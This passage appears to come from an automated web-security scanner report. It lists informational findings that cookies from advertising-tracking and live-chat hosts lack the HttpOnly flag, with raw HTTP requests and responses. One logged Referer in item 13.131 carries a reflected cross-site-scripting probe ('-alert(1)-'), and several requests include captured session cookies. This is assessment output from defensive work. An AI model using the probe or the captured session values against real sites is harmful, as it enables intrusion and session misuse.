uid=1_1305510847_1305465388147:4406953890584386; Domain=.fetchback.com; Expires=Sat, 14-May-2016 01:54:07 GMT; Path=/
kwd=1_1305510847; Domain=.fetchback.com; Expires=Sat, 14-May-2016 01:54:07 GMT; Path=/
sit=1_1305510847_3166:647:0_3167:675:9_1888:45459:45459; Domain=.fetchback.com; Expires=Sat, 14-May-2016 01:54:07 GMT; Path=/
cre=1_1305510847; Domain=.fetchback.com; Expires=Sat, 14-May-2016 01:54:07 GMT; Path=/
bpd=1_1305510847; Domain=.fetchback.com; Expires=Sat, 14-May-2016 01:54:07 GMT; Path=/
apd=1_1305510847; Domain=.fetchback.com; Expires=Sat, 14-May-2016 01:54:07 GMT; Path=/
scg=1_1305510847; Domain=.fetchback.com; Expires=Sat, 14-May-2016 01:54:07 GMT; Path=/
ppd=1_1305510847; Domain=.fetchback.com; Expires=Sat, 14-May-2016 01:54:07 GMT; Path=/
afl=1_1305510847; Domain=.fetchback.com; Expires=Sat, 14-May-2016 01:54:07 GMT; Path=/

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

Response

13.114. http://pixel.fetchback.com/serve/fb/ver previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://pixel.fetchback.com
Path:	/serve/fb/ver

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

uid=1_1305543177_1302186535420:5639073448711300; Domain=.fetchback.com; Expires=Sat, 14-May-2016 10:52:57 GMT; Path=/
cre=1_1305543177; Domain=.fetchback.com; Expires=Sat, 14-May-2016 10:52:57 GMT; Path=/

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

Response

13.115. http://pixel.mathtag.com/data/img previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://pixel.mathtag.com
Path:	/data/img

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

ts=1305510870; domain=.mathtag.com; path=/; expires=Tue, 15-May-2012 01:54:30 GMT
mt_mop=1:1305510843|5:1305510870|9:1305510197; domain=.mathtag.com; path=/; expires=Wed, 15-Jun-2011 01:54:30 GMT

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

Response

13.116. http://pixel.mathtag.com/event/img previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://pixel.mathtag.com
Path:	/event/img

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

ts=1305510867; domain=.mathtag.com; path=/; expires=Tue, 15-May-2012 01:54:27 GMT

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

Response

13.117. http://pixel.rubiconproject.com/tap.php previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://pixel.rubiconproject.com
Path:	/tap.php

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

rpb=5671%3D1%264212%3D1%263580%3D1%264222%3D1%266811%3D1%265421%3D1; expires=Wed, 15-Jun-2011 02:01:48 GMT; path=/; domain=.rubiconproject.com
rpx=5671%3D11993%2C0%2C1%2C%2C%264212%3D11993%2C0%2C1%2C%2C%263580%3D11993%2C0%2C1%2C%2C%264222%3D11993%2C0%2C1%2C%2C%266811%3D11993%2C0%2C1%2C%2C%265421%3D11993%2C1%2C2%2C%2C; expires=Wed, 15-Jun-2011 02:01:48 GMT; path=/; domain=.pixel.rubiconproject.com
put_2054=c4f44b7e-9074-47a2-bdf0-9dda4e9d5fa4; expires=Wed, 15-Jun-2011 02:01:48 GMT; path=/; domain=.rubiconproject.com

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

Response

13.118. http://pixel.traveladvertising.com/Live/Pixel.aspx previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://pixel.traveladvertising.com
Path:	/Live/Pixel.aspx

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

CookieId=2943716f476840758470c226fe759afb;Path=/;Domain=.traveladvertising.com;Expires=Sun, 08-Feb-2060 02:02:56 GMT
CookieDropperDropRetarget_CriteoRT=49600;Path=/;Domain=.traveladvertising.com;Expires=Wed, 15-Jun-2011 02:02:56 GMT

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

Response

13.119. http://px.steelhousemedia.com/pr previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://px.steelhousemedia.com
Path:	/pr

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

guid=1537f5df-e7b9-46ee-8bec-7f939810aa52;Domain=.steelhousemedia.com;Expires=Sat, 03-Jun-2079 13:55:47 GMT
tts="eyJOUl85MDU2XzEyNiI6MCwiOTA1Nl80OCI6MTMwMjk1MDUwMDU3OCwiOTA1Nl80NiI6MTMwMjk1MDUwMDU3OCwiOTA1Nl80OSI6MTMwNTU0MjUwMDU3OCwiTlJfOTA1Nl83NSI6MCwiOTA1Nl8xMjYiOjEzMDI5NTA1MDA1NzgsIjkwNTZfNDQiOjEzMDI5NTA1MDA1NzgsIk5SXzkwNTZfMjY5IjowLCI5MDU2XzQyIjoxMzAyOTUwNTAwNTc4LCI5MDU2XzE3MyI6MTMwNTU0MjUwMDU3OCwiTlJfOTA1Nl8xNzMiOjAsIjkwNTZfMTcwIjoxMzAyOTUwNTAwNTc4LCJOUl85MDU2XzI3MCI6MCwiOTA1Nl8yODUiOjEzMDU1NDI1MDA1NzgsIjkwNTZfMjY5IjoxMzA1NTQyNTAwNTc4LCJOUl85MDU2XzEzOSI6MCwiTlJfOTA1Nl8yNzYiOjAsIjkwNTZfNzUiOjEzMDI5NTA1MDA1NzgsIk5SXzkwNTZfNDkiOjAsIk5SXzkwNTZfNDgiOjAsIk5SXzkwNTZfMjE3IjowLCJOUl85MDU2XzE3MCI6MCwiOTA1Nl8yMTciOjEzMDI5NTA1MDA1NzgsIjkwNTZfMjcwIjoxMzA1NTQyNTAwNTc4LCJOUl85MDU2XzQ0IjowLCI5MDU2XzEzOSI6MTMwMjk1MDUwMDU3OCwiTlJfOTA1Nl80NiI6MCwiTlJfOTA1Nl8yODUiOjAsIjkwNTZfMjc2IjoxMzA1NTQyNTAwNTc4LCJzdGlja3lJZF8yOSI6bnVsbCwiTlJfOTA1Nl80MiI6MH0=";Version=1;Domain=.steelhousemedia.com;Expires=Sat, 03-Jun-2079 13:55:47 GMT;Max-Age=2147483647
checkCookie=success;Path=/;Domain=.steelhousemedia.com;Expires=Thu, 01-Jan-1970 00:00:00 GMT

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

Response

13.120. http://px.steelhousemedia.com/st previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://px.steelhousemedia.com
Path:	/st

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

guid=c056e86d-7ee9-4885-969a-4f3148039040;Domain=.steelhousemedia.com;Expires=Sat, 03-Jun-2079 13:55:47 GMT
tts="eyJOUl85MDU2XzEyNiI6MCwiOTA1Nl80OCI6MTMwMjk1MDUwMDU0MCwiOTA1Nl80NiI6MTMwMjk1MDUwMDU0MCwiOTA1Nl80OSI6MTMwNTU0MjUwMDU0MCwiTlJfOTA1Nl83NSI6MCwiOTA1Nl8xMjYiOjEzMDI5NTA1MDA1NDAsIjkwNTZfNDQiOjEzMDI5NTA1MDA1NDAsIk5SXzkwNTZfMjY5IjowLCI5MDU2XzQyIjoxMzAyOTUwNTAwNTQwLCI5MDU2XzE3MyI6MTMwNTU0MjUwMDU0MCwiTlJfOTA1Nl8xNzMiOjAsIjkwNTZfMTcwIjoxMzAyOTUwNTAwNTQwLCJOUl85MDU2XzI3MCI6MCwiOTA1Nl8yODUiOjEzMDU1NDI1MDA1NDAsIjkwNTZfMjY5IjoxMzA1NTQyNTAwNTQwLCJOUl85MDU2XzEzOSI6MCwiTlJfOTA1Nl8yNzYiOjAsIjkwNTZfNzUiOjEzMDI5NTA1MDA1NDAsIk5SXzkwNTZfNDkiOjAsIk5SXzkwNTZfNDgiOjAsIk5SXzkwNTZfMjE3IjowLCJOUl85MDU2XzE3MCI6MCwiOTA1Nl8yMTciOjEzMDI5NTA1MDA1NDAsIjkwNTZfMjcwIjoxMzA1NTQyNTAwNTQwLCJOUl85MDU2XzQ0IjowLCI5MDU2XzEzOSI6MTMwMjk1MDUwMDU0MCwiTlJfOTA1Nl80NiI6MCwiTlJfOTA1Nl8yODUiOjAsIjkwNTZfMjc2IjoxMzA1NTQyNTAwNTQwLCJzdGlja3lJZF8yOSI6bnVsbCwiTlJfOTA1Nl80MiI6MH0=";Version=1;Domain=.steelhousemedia.com;Expires=Sat, 03-Jun-2079 13:55:47 GMT;Max-Age=2147483647
checkCookie=success;Path=/;Domain=.steelhousemedia.com;Expires=Thu, 01-Jan-1970 00:00:00 GMT

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

Response

13.121. http://r.turn.com/r/beacon previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://r.turn.com
Path:	/r/beacon

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

uid=4325897289836481830; Domain=.turn.com; Expires=Sat, 12-Nov-2011 01:56:37 GMT; Path=/
pf=qbuRlHr65Kba4HTyrdd5MH3JdGv9GZeYHo7AeFWHp0731R35t8tVFswvyCCUNmQRg2c436_EtLBPbUDtd-MYNmtAckgKwFTyh_sZsdEXBQ1CpT6DcV9IbY-hvpa_KWAErvwOhTKiEB6ozjplWfA-GmdZ3kW7KFyw4Yua0NKdSC6x49DR9xNu-8EqcBJ8MiPRFWemUI9n3OLgXGmu3F70XMl066eGY_QbhSpsRERo8nuIuHRQTgKEhELMLulgSubjEdeE8ARPtyCF9fzzWEQ5dfX6GDuctpcNnRGwBo7rSoxo-nkvo1J3Zd1nNNhXLF9CW1P_6CrTbMkoipJrBwBOyDD0FkxBUi5AYhqoFv0boAuD5cjBNWX99VFn97_13LO4; Domain=.turn.com; Expires=Sat, 12-Nov-2011 01:56:37 GMT; Path=/

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

Response

13.122. http://rpt.footlocker.com/eluminate previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://rpt.footlocker.com
Path:	/eluminate

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

90101910_login=1305542192011750759490101910; path=/
90101910_reset=1305542192;path=/

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /eluminate?tid=14&ci=90101910&vn2=e4.0&st=1305510865474&vn1=4.8.3H&ec=utf-8&cid=Global%20Header&cat=1&ccid=Log%20In&rnd=1305542546765&ul=http%3A%2F%2Fwww.footlocker.com%2F HTTP/1.1
Host: rpt.footlocker.com
Proxy-Connection: keep-alive
Referer: http://www.footlocker.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: mbcc=AFC75D5D-C7E2-5D3D-AA90-829AA86D100E; CoreID6=50071305510227062460103; TestSess3=50071305510227062460103; 90101910_login=1305510229010073037890101910; SSLC=web07; 90101910_reset=1305510867

Response

HTTP/1.1 200 OK
Date: Mon, 16 May 2011 10:36:32 GMT
Server: Apache
P3P: CP="NON DSP COR CUR ADMo DEVo PSAo PSDo OUR IND ONL UNI PUR COM NAV INT DEM STA"
Set-Cookie: 90101910_login=1305542192011750759490101910; path=/
Set-Cookie: 90101910_reset=1305542192;path=/
Expires: Sun, 15 May 2011 16:36:32 GMT
Cache-Control: no-cache, no-store, must-revalidate, max-age=0, proxy-revalidate, no-transform, pre-check=0, post-check=0, private
Pragma: no-cache
Content-Type: image/gif
Content-Length: 43

GIF89a.............!.......,........@..D..;

13.123. http://rya.rockyou.com/ams/ptrck.php previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://rya.rockyou.com
Path:	/ams/ptrck.php

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

_uix=1e332431789352e278724a20ce3eae2f33216d6dfd8aae4ea32b9e5902c2eede; expires=Sat, 12-Nov-2011 02:01:38 GMT; path=/; domain=rockyou.com
_uix=1e332431789352e278724a20ce3eae2f33216d6dfd8aae4ea32b9e5902c2eede; expires=Sat, 12-Nov-2011 02:01:38 GMT; path=/; domain=rockyou.com

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

Response

13.124. http://s.xp1.ru4.com/meta previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://s.xp1.ru4.com
Path:	/meta

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

1315892-B1315899=0|0|0|0|0|1315897|1315896|-1; domain=.ru4.com; path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

Response

13.125. http://sales.liveperson.net/hc/1402662/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://sales.liveperson.net
Path:	/hc/1402662/

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

HumanClickKEY=1762910904442911687; path=/hc/1402662
HumanClickACTIVE=1305511390360; expires=Tue, 17-May-2011 02:03:10 GMT; path=/

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /hc/1402662/?&site=1402662&cmd=mTagKnockPage&lpCallId=719463137909-934704558457&protV=20&lpjson=1&id=9169521417&javaSupport=true&visitorStatus=INSITE_STATUS HTTP/1.1
Host: sales.liveperson.net
Proxy-Connection: keep-alive
Referer: http://www.bluefly.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: LivePersonID=LP i=16101514677756,d=1305377522; ASPSESSIONIDASBBACST=BACHFIHAANHOFIJGPHFLPPDG; HumanClickACTIVE=1305510908159; ASPSESSIONIDSQBBBCQB=AJBFJLFBKKLLCEBDLJEAJLLC

Response

HTTP/1.1 200 OK
Date: Mon, 16 May 2011 02:03:10 GMT
Server: Microsoft-IIS/6.0
P3P: CP="NON BUS INT NAV COM ADM CON CUR IVA IVD OTP PSA PSD TEL SAM"
X-Powered-By: ASP.NET
Set-Cookie: HumanClickKEY=1762910904442911687; path=/hc/1402662
Set-Cookie: HumanClickACTIVE=1305511390360; expires=Tue, 17-May-2011 02:03:10 GMT; path=/
Content-Type: application/x-javascript
Accept-Ranges: bytes
Last-Modified: Mon, 16 May 2011 02:03:10 GMT
Cache-Control: no-store
Pragma: no-cache
Expires: Wed, 31 Dec 1969 23:59:59 GMT
Content-Length: 1475

lpConnLib.Process({"ResultSet": {"lpCallId":"719463137909-934704558457","lpCallConfirm":"","lpJS_Execute":[{"code_id": "webServerOverride", "js_code": "if (lpMTagConfig.lpServer != 'sales.liveperson.n
...[SNIP]...

13.126. http://sales.liveperson.net/hc/1402662/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://sales.liveperson.net
Path:	/hc/1402662/

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

HumanClickSiteContainerID_1402662=STANDALONE; path=/hc/1402662
LivePersonID=-16101514677756-1305510918:-1:-1:-1:-1; expires=Tue, 15-May-2012 02:03:16 GMT; path=/hc/1402662; domain=.liveperson.net

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

Response

13.127. http://sales.liveperson.net/hc/1402662/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://sales.liveperson.net
Path:	/hc/1402662/

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

HumanClickACTIVE=1305511644875; expires=Tue, 17-May-2011 02:07:24 GMT; path=/
HumanClickSiteContainerID_1402662=STANDALONE; path=/hc/1402662

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /hc/1402662/?&site=1402662&cmd=mTagKnockPage&lpCallId=164293947862-695144355529&protV=20&lpjson=1&id=124698677&javaSupport=true&visitorStatus=INSITE_STATUS HTTP/1.1
Host: sales.liveperson.net
Proxy-Connection: keep-alive
Referer: http://www.bluefly.com/myfly/login.jsp;jsessionid=ONzgfawlrUIPLStla7ZseA**.bluefly_node4
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: HumanClickKEY=8637489434147818322; LivePersonID=-16101514677756-1305510918:-1:-1:-1:-1; HumanClickSiteContainerID_1402662=STANDALONE; LivePersonID=LP i=16101514677756,d=1305377522; ASPSESSIONIDASBBACST=BACHFIHAANHOFIJGPHFLPPDG; ASPSESSIONIDSQBBBCQB=AJBFJLFBKKLLCEBDLJEAJLLC; HumanClickACTIVE=1305510914551

Response

HTTP/1.1 200 OK
Date: Mon, 16 May 2011 02:07:24 GMT
Server: Microsoft-IIS/6.0
P3P: CP="NON BUS INT NAV COM ADM CON CUR IVA IVD OTP PSA PSD TEL SAM"
X-Powered-By: ASP.NET
Set-Cookie: HumanClickACTIVE=1305511644875; expires=Tue, 17-May-2011 02:07:24 GMT; path=/
Content-Type: application/x-javascript
Accept-Ranges: bytes
Last-Modified: Mon, 16 May 2011 02:07:24 GMT
Set-Cookie: HumanClickSiteContainerID_1402662=STANDALONE; path=/hc/1402662
Cache-Control: no-store
Pragma: no-cache
Expires: Wed, 31 Dec 1969 23:59:59 GMT
Content-Length: 1475

lpConnLib.Process({"ResultSet": {"lpCallId":"164293947862-695144355529","lpCallConfirm":"","lpJS_Execute":[{"code_id": "webServerOverride", "js_code": "if (lpMTagConfig.lpServer != 'sales.liveperson.n
...[SNIP]...

13.128. http://sales.liveperson.net/hc/46281118/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://sales.liveperson.net
Path:	/hc/46281118/

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

HumanClickACTIVE=1305512042652; expires=Tue, 17-May-2011 02:14:02 GMT; path=/
HumanClickSiteContainerID_46281118=STANDALONE; path=/hc/46281118
LivePersonID=-16101514677756-1305510894:-1:1305511414:-1:-1; expires=Tue, 15-May-2012 02:14:02 GMT; path=/hc/46281118; domain=.liveperson.net

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /hc/46281118/?&site=46281118&cmd=mTagKnockPage&lpCallId=696138575207-644512902246&protV=20&lpjson=1&id=3105604888&javaSupport=true&visitorStatus=INSITE_STATUS&dbut=chat-service-petco-english%7ClpMTagConfig.db1%7ClpButton-service-petco-english%7C HTTP/1.1
Host: sales.liveperson.net
Proxy-Connection: keep-alive
Referer: http://www.petco.com/Secure/Login.aspx?ReturnUrl=/Secure/YourAccount.aspx
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: HumanClickKEY=9049118658396575219; LivePersonID=-16101514677756-1305510894:-1:-1:-1:-1; HumanClickSiteContainerID_46281118=STANDALONE; LivePersonID=LP i=16101514677756,d=1305377522; ASPSESSIONIDASBBACST=BACHFIHAANHOFIJGPHFLPPDG; ASPSESSIONIDSQBBBCQB=AJBFJLFBKKLLCEBDLJEAJLLC; HumanClickACTIVE=1305511139578; ASPSESSIONIDSQQDDBBA=PFKNNJDBKAJLDGDMHMKKDBLP

Response

HTTP/1.1 200 OK
Date: Mon, 16 May 2011 02:14:02 GMT
Server: Microsoft-IIS/6.0
P3P: CP="NON BUS INT NAV COM ADM CON CUR IVA IVD OTP PSA PSD TEL SAM"
X-Powered-By: ASP.NET
Set-Cookie: HumanClickACTIVE=1305512042652; expires=Tue, 17-May-2011 02:14:02 GMT; path=/
Content-Type: application/x-javascript
Accept-Ranges: bytes
Last-Modified: Mon, 16 May 2011 02:14:02 GMT
Set-Cookie: HumanClickSiteContainerID_46281118=STANDALONE; path=/hc/46281118
Set-Cookie: LivePersonID=-16101514677756-1305510894:-1:1305511414:-1:-1; expires=Tue, 15-May-2012 02:14:02 GMT; path=/hc/46281118; domain=.liveperson.net
Cache-Control: no-store
Pragma: no-cache
Expires: Wed, 31 Dec 1969 23:59:59 GMT
Content-Length: 27626

lpConnLib.Process({"ResultSet": {"lpCallId":"696138575207-644512902246","lpCallConfirm":"","lpJS_Execute":[{"code_id": "webServerOverride", "js_code": "if (lpMTagConfig.lpServer != 'sales.liveperson.n
...[SNIP]...

13.129. http://sales.liveperson.net/hc/46281118/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://sales.liveperson.net
Path:	/hc/46281118/

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

HumanClickKEY=7765532767891690227; path=/hc/46281118
HumanClickACTIVE=1305511278307; expires=Tue, 17-May-2011 02:01:18 GMT; path=/

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /hc/46281118/?&site=46281118&cmd=mTagKnockPage&lpCallId=221431557555-817593283718&protV=20&lpjson=1&id=2321407874&javaSupport=true&visitorStatus=INSITE_STATUS&dbut=chat-sales-petco-english-2%7ClpMTagConfig.db1%7ClpButton-sales-petco-english%7C HTTP/1.1
Host: sales.liveperson.net
Proxy-Connection: keep-alive
Referer: http://www.petco.com/?AID=10413444&PID=2537521&cm_mmc=CJ-_-CID-_-2537521-_-10413444
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: HumanClickKEY=5655530747531728922; LivePersonID=-16101514677756-1305510216:-1:-1:-1:-1; HumanClickSiteContainerID_46281118=STANDALONE; LivePersonID=LP i=16101514677756,d=1305377522; ASPSESSIONIDASBBACST=BACHFIHAANHOFIJGPHFLPPDG; HumanClickACTIVE=1305510207439

Response

HTTP/1.1 200 OK
Date: Mon, 16 May 2011 02:01:18 GMT
Server: Microsoft-IIS/6.0
P3P: CP="NON BUS INT NAV COM ADM CON CUR IVA IVD OTP PSA PSD TEL SAM"
X-Powered-By: ASP.NET
Set-Cookie: HumanClickKEY=7765532767891690227; path=/hc/46281118
Set-Cookie: HumanClickACTIVE=1305511278307; expires=Tue, 17-May-2011 02:01:18 GMT; path=/
Content-Type: application/x-javascript
Accept-Ranges: bytes
Last-Modified: Mon, 16 May 2011 02:01:18 GMT
Cache-Control: no-store
Pragma: no-cache
Expires: Wed, 31 Dec 1969 23:59:59 GMT
Content-Length: 27627

lpConnLib.Process({"ResultSet": {"lpCallId":"221431557555-817593283718","lpCallConfirm":"","lpJS_Execute":[{"code_id": "webServerOverride", "js_code": "if (lpMTagConfig.lpServer != 'sales.liveperson.n
...[SNIP]...

13.130. http://sales.liveperson.net/hc/53965383/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://sales.liveperson.net
Path:	/hc/53965383/

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

HumanClickSiteContainerID_53965383=STANDALONE; path=/hc/53965383
LivePersonID=-16101514677756-1305510911:-1:-1:-1:-1; expires=Tue, 15-May-2012 02:02:56 GMT; path=/hc/53965383; domain=.liveperson.net

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

Response

13.131. http://sales.liveperson.net/hc/53965383/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://sales.liveperson.net
Path:	/hc/53965383/

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

HumanClickACTIVE=1305542521752; expires=Tue, 17-May-2011 10:42:01 GMT; path=/
HumanClickSiteContainerID_53965383=STANDALONE; path=/hc/53965383

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /hc/53965383/?&site=53965383&cmd=mTagKnockPage&lpCallId=462539339205-611415113089&protV=20&lpjson=1&id=9685350975&javaSupport=true&visitorStatus=INSITE_STATUS&dbut=chat-toshiba-english-laptop%7Cnull%7ClpButton%7C HTTP/1.1
Host: sales.liveperson.net
Proxy-Connection: keep-alive
Referer: http://www.toshibadirect.com/td/b2c/laptops.to?page=segHHO7dc89'-alert(1)-'b678a22fbfb
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: HumanClickKEY=5073846237920387925; LivePersonID=-16101514677756-1305542458:-1:-1:-1:-1; HumanClickSiteContainerID_53965383=STANDALONE; LivePersonID=LP i=16101514677756,d=1305377522; ASPSESSIONIDASBBACST=BACHFIHAANHOFIJGPHFLPPDG; ASPSESSIONIDSQBBBCQB=AJBFJLFBKKLLCEBDLJEAJLLC; ASPSESSIONIDSQQDDBBA=PFKNNJDBKAJLDGDMHMKKDBLP; ASPSESSIONIDQQSDBBST=HDNGFJFBPMFLJCBLKCDCDNAI; HumanClickACTIVE=1305542456097

Response

HTTP/1.1 200 OK
Date: Mon, 16 May 2011 10:42:01 GMT
Server: Microsoft-IIS/6.0
P3P: CP="NON BUS INT NAV COM ADM CON CUR IVA IVD OTP PSA PSD TEL SAM"
X-Powered-By: ASP.NET
Set-Cookie: HumanClickACTIVE=1305542521752; expires=Tue, 17-May-2011 10:42:01 GMT; path=/
Content-Type: application/x-javascript
Accept-Ranges: bytes
Last-Modified: Mon, 16 May 2011 10:42:01 GMT
Set-Cookie: HumanClickSiteContainerID_53965383=STANDALONE; path=/hc/53965383
Cache-Control: no-store
Pragma: no-cache
Expires: Wed, 31 Dec 1969 23:59:59 GMT
Content-Length: 28192

lpConnLib.Process({"ResultSet": {"lpCallId":"462539339205-611415113089","lpCallConfirm":"","lpJS_Execute":[{"code_id": "webServerOverride", "js_code": "if (lpMTagConfig.lpServer != 'sales.liveperson.n
...[SNIP]...

13.132. http://sales.liveperson.net/hc/53965383/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://sales.liveperson.net
Path:	/hc/53965383/

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

HumanClickKEY=3588534029298802466; path=/hc/53965383
HumanClickACTIVE=1305511374488; expires=Tue, 17-May-2011 02:02:54 GMT; path=/

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /hc/53965383/?&site=53965383&cmd=mTagKnockPage&lpCallId=169177485630-465463362168&protV=20&lpjson=1&id=4691856149&javaSupport=true&visitorStatus=INSITE_STATUS&dbut=chat-toshiba-english-laptop%7Cnull%7ClpButton%7C HTTP/1.1
Host: sales.liveperson.net
Proxy-Connection: keep-alive
Referer: http://www.toshibadirect.com/td/b2c/laptops.to?page=segHHO
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: HumanClickKEY=764357015027527896; LivePersonID=-16101514677756-1305510079:-1:-1:-1:-1; HumanClickSiteContainerID_53965383=STANDALONE; LivePersonID=LP i=16101514677756,d=1305377522; ASPSESSIONIDASBBACST=BACHFIHAANHOFIJGPHFLPPDG; HumanClickACTIVE=1305510890596

Response

HTTP/1.1 200 OK
Date: Mon, 16 May 2011 02:02:54 GMT
Server: Microsoft-IIS/6.0
P3P: CP="NON BUS INT NAV COM ADM CON CUR IVA IVD OTP PSA PSD TEL SAM"
X-Powered-By: ASP.NET
Set-Cookie: HumanClickKEY=3588534029298802466; path=/hc/53965383
Set-Cookie: HumanClickACTIVE=1305511374488; expires=Tue, 17-May-2011 02:02:54 GMT; path=/
Content-Type: application/x-javascript
Accept-Ranges: bytes
Last-Modified: Mon, 16 May 2011 02:02:54 GMT
Cache-Control: no-store
Pragma: no-cache
Expires: Wed, 31 Dec 1969 23:59:59 GMT
Content-Length: 28192

lpConnLib.Process({"ResultSet": {"lpCallId":"169177485630-465463362168","lpCallConfirm":"","lpJS_Execute":[{"code_id": "webServerOverride", "js_code": "if (lpMTagConfig.lpServer != 'sales.liveperson.n
...[SNIP]...

13.133. http://seal-alaskaoregonwesternwashington.bbb.org/logo/rbhzbus/blue-nile-15026564.png previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://seal-alaskaoregonwesternwashington.bbb.org
Path:	/logo/rbhzbus/blue-nile-15026564.png

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

